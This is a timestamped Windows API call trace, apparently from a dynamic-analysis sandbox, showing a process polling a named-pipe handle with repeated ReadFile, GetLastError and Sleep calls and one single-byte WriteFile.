	[0199.400] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.400] GetLastError () returned 0x218
	[0199.400] Sleep (dwMilliseconds=0xa) 
	[0199.429] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.429] GetLastError () returned 0x218
	[0199.429] Sleep (dwMilliseconds=0xa) 
	[0199.431] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.431] GetLastError () returned 0x218
	[0199.431] Sleep (dwMilliseconds=0xa) 
	[0199.447] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.447] GetLastError () returned 0x218
	[0199.447] Sleep (dwMilliseconds=0xa) 
	[0199.463] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.463] GetLastError () returned 0x218
	[0199.463] Sleep (dwMilliseconds=0xa) 
	[0199.478] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.478] GetLastError () returned 0x218
	[0199.478] Sleep (dwMilliseconds=0xa) 
	[0199.540] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.540] GetLastError () returned 0x218
	[0199.540] Sleep (dwMilliseconds=0xa) 
	[0199.681] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.681] GetLastError () returned 0x218
	[0199.681] Sleep (dwMilliseconds=0x3e8) 
	[0200.695] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0200.695] Sleep (dwMilliseconds=0xa) 
	[0200.710] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.710] GetLastError () returned 0x218
	[0200.710] Sleep (dwMilliseconds=0xa) 
	[0200.726] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.726] GetLastError () returned 0x218
	[0200.726] Sleep (dwMilliseconds=0xa) 
	[0200.742] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.742] GetLastError () returned 0x218
	[0200.742] Sleep (dwMilliseconds=0xa) 
	[0200.788] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.788] GetLastError () returned 0x218
	[0200.788] Sleep (dwMilliseconds=0xa) 
	[0200.835] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.835] GetLastError () returned 0x218
	[0200.835] Sleep (dwMilliseconds=0xa) 
	[0200.860] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.860] GetLastError () returned 0x218
	[0200.860] Sleep (dwMilliseconds=0xa) 
	[0200.866] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.866] GetLastError () returned 0x218
	[0200.866] Sleep (dwMilliseconds=0xa) 
	[0200.884] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.884] GetLastError () returned 0x218
	[0200.884] Sleep (dwMilliseconds=0xa) 
	[0200.898] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.898] GetLastError () returned 0x218
	[0200.898] Sleep (dwMilliseconds=0xa) 
	[0200.913] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.913] GetLastError () returned 0x218
	[0200.914] Sleep (dwMilliseconds=0xa) 
	[0200.929] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.929] GetLastError () returned 0x218
	[0200.929] Sleep (dwMilliseconds=0xa) 
	[0200.944] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.945] GetLastError () returned 0x218
	[0200.945] Sleep (dwMilliseconds=0xa) 
	[0200.960] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0200.960] GetLastError () returned 0x218
	[0200.960] Sleep (dwMilliseconds=0xa) 
	[0201.006] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.007] GetLastError () returned 0x218
	[0201.007] Sleep (dwMilliseconds=0xa) 
	[0201.054] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.054] GetLastError () returned 0x218
	[0201.054] Sleep (dwMilliseconds=0xa) 
	[0201.111] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.111] GetLastError () returned 0x218
	[0201.112] Sleep (dwMilliseconds=0xa) 
	[0201.116] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.116] GetLastError () returned 0x218
	[0201.116] Sleep (dwMilliseconds=0xa) 
	[0201.132] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.132] GetLastError () returned 0x218
	[0201.132] Sleep (dwMilliseconds=0xa) 
	[0201.147] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.147] GetLastError () returned 0x218
	[0201.147] Sleep (dwMilliseconds=0xa) 
	[0201.163] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.163] GetLastError () returned 0x218
	[0201.163] Sleep (dwMilliseconds=0xa) 
	[0201.179] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.179] GetLastError () returned 0x218
	[0201.179] Sleep (dwMilliseconds=0xa) 
	[0201.225] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.225] GetLastError () returned 0x218
	[0201.225] Sleep (dwMilliseconds=0xa) 
	[0201.274] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.274] GetLastError () returned 0x218
	[0201.274] Sleep (dwMilliseconds=0xa) 
	[0201.288] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.288] GetLastError () returned 0x218
	[0201.288] Sleep (dwMilliseconds=0xa) 
	[0201.303] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.303] GetLastError () returned 0x218
	[0201.303] Sleep (dwMilliseconds=0xa) 
	[0201.319] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.319] GetLastError () returned 0x218
	[0201.319] Sleep (dwMilliseconds=0xa) 
	[0201.334] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.334] GetLastError () returned 0x218
	[0201.334] Sleep (dwMilliseconds=0xa) 
	[0201.350] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.350] GetLastError () returned 0x218
	[0201.350] Sleep (dwMilliseconds=0xa) 
	[0201.367] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.367] GetLastError () returned 0x218
	[0201.367] Sleep (dwMilliseconds=0xa) 
	[0201.381] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.381] GetLastError () returned 0x218
	[0201.382] Sleep (dwMilliseconds=0xa) 
	[0201.428] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.428] GetLastError () returned 0x218
	[0201.428] Sleep (dwMilliseconds=0xa) 
	[0201.461] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.461] GetLastError () returned 0x218
	[0201.461] Sleep (dwMilliseconds=0xa) 
	[0201.492] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.493] GetLastError () returned 0x218
	[0201.493] Sleep (dwMilliseconds=0xa) 
	[0201.506] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.506] GetLastError () returned 0x218
	[0201.506] Sleep (dwMilliseconds=0xa) 
	[0201.524] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.524] GetLastError () returned 0x218
	[0201.524] Sleep (dwMilliseconds=0xa) 
	[0201.537] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.537] GetLastError () returned 0x218
	[0201.538] Sleep (dwMilliseconds=0xa) 
	[0201.553] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.553] GetLastError () returned 0x218
	[0201.553] Sleep (dwMilliseconds=0xa) 
	[0201.569] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.569] GetLastError () returned 0x218
	[0201.569] Sleep (dwMilliseconds=0xa) 
	[0201.587] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.587] GetLastError () returned 0x218
	[0201.587] Sleep (dwMilliseconds=0xa) 
	[0201.600] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.600] GetLastError () returned 0x218
	[0201.600] Sleep (dwMilliseconds=0xa) 
	[0201.646] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.646] GetLastError () returned 0x218
	[0201.646] Sleep (dwMilliseconds=0xa) 
	[0201.688] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.756] GetLastError () returned 0x218
	[0201.756] Sleep (dwMilliseconds=0xa) 
	[0201.833] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.833] GetLastError () returned 0x218
	[0201.833] Sleep (dwMilliseconds=0xa) 
	[0201.880] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.880] GetLastError () returned 0x218
	[0201.880] Sleep (dwMilliseconds=0xa) 
	[0201.913] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.913] GetLastError () returned 0x218
	[0201.913] Sleep (dwMilliseconds=0xa) 
	[0201.974] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0201.974] GetLastError () returned 0x218
	[0201.974] Sleep (dwMilliseconds=0xa) 
	[0202.020] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.020] GetLastError () returned 0x218
	[0202.021] Sleep (dwMilliseconds=0xa) 
	[0202.039] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.039] GetLastError () returned 0x218
	[0202.039] Sleep (dwMilliseconds=0xa) 
	[0202.079] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.079] GetLastError () returned 0x218
	[0202.079] Sleep (dwMilliseconds=0xa) 
	[0202.083] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.083] GetLastError () returned 0x218
	[0202.083] Sleep (dwMilliseconds=0xa) 
	[0202.099] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.099] GetLastError () returned 0x218
	[0202.099] Sleep (dwMilliseconds=0xa) 
	[0202.114] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.114] GetLastError () returned 0x218
	[0202.114] Sleep (dwMilliseconds=0xa) 
	[0202.130] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.130] GetLastError () returned 0x218
	[0202.130] Sleep (dwMilliseconds=0xa) 
	[0202.145] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.146] GetLastError () returned 0x218
	[0202.146] Sleep (dwMilliseconds=0xa) 
	[0202.195] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.195] GetLastError () returned 0x218
	[0202.195] Sleep (dwMilliseconds=0xa) 
	[0202.239] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.239] GetLastError () returned 0x218
	[0202.239] Sleep (dwMilliseconds=0xa) 
	[0202.269] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.269] GetLastError () returned 0x218
	[0202.269] Sleep (dwMilliseconds=0xa) 
	[0202.272] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.272] GetLastError () returned 0x218
	[0202.272] Sleep (dwMilliseconds=0xa) 
	[0202.286] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.286] GetLastError () returned 0x218
	[0202.286] Sleep (dwMilliseconds=0xa) 
	[0202.302] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.302] GetLastError () returned 0x218
	[0202.302] Sleep (dwMilliseconds=0xa) 
	[0202.318] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.318] GetLastError () returned 0x218
	[0202.318] Sleep (dwMilliseconds=0xa) 
	[0202.333] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.333] GetLastError () returned 0x218
	[0202.333] Sleep (dwMilliseconds=0xa) 
	[0202.348] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.348] GetLastError () returned 0x218
	[0202.349] Sleep (dwMilliseconds=0xa) 
	[0202.364] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.364] GetLastError () returned 0x218
	[0202.364] Sleep (dwMilliseconds=0xa) 
	[0202.414] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.414] GetLastError () returned 0x218
	[0202.414] Sleep (dwMilliseconds=0xa) 
	[0202.466] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.466] GetLastError () returned 0x218
	[0202.466] Sleep (dwMilliseconds=0xa) 
	[0202.488] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.488] GetLastError () returned 0x218
	[0202.488] Sleep (dwMilliseconds=0xa) 
